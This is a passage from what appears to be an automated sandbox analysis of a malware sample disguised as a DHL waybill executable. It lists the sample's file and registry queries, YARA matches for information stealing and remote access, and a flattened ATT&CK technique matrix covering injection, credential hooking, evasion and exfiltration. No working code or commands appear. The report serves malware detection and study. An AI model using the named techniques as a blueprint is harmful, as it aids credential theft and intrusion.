          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DHL WB# 2343640950.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DHL WB# 2343640950.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL WB# 2343640950.exe.38555a0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.493111927.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425338191.0000000003855000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.417761109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.466672366.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.417286385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.641809703.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508664053.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.640957593.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.641933655.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DHL WB# 2343640950.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DHL WB# 2343640950.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL WB# 2343640950.exe.38555a0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.493111927.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425338191.0000000003855000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.417761109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.466672366.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.417286385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.641809703.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508664053.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.640957593.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.641933655.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules
          Path Interception512
          Process Injection
          1
          Rootkit
          1
          Credential API Hooking
          1
          Query Registry
          Remote Services1
          Credential API Hooking
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Masquerading
          1
          Input Capture
          221
          Security Software Discovery
          Remote Desktop Protocol1
          Input Capture
          Exfiltration Over Bluetooth3
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Disable or Modify Tools
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin Shares1
          Archive Collected Data
          Automated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
          Virtualization/Sandbox Evasion
          NTDS31
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
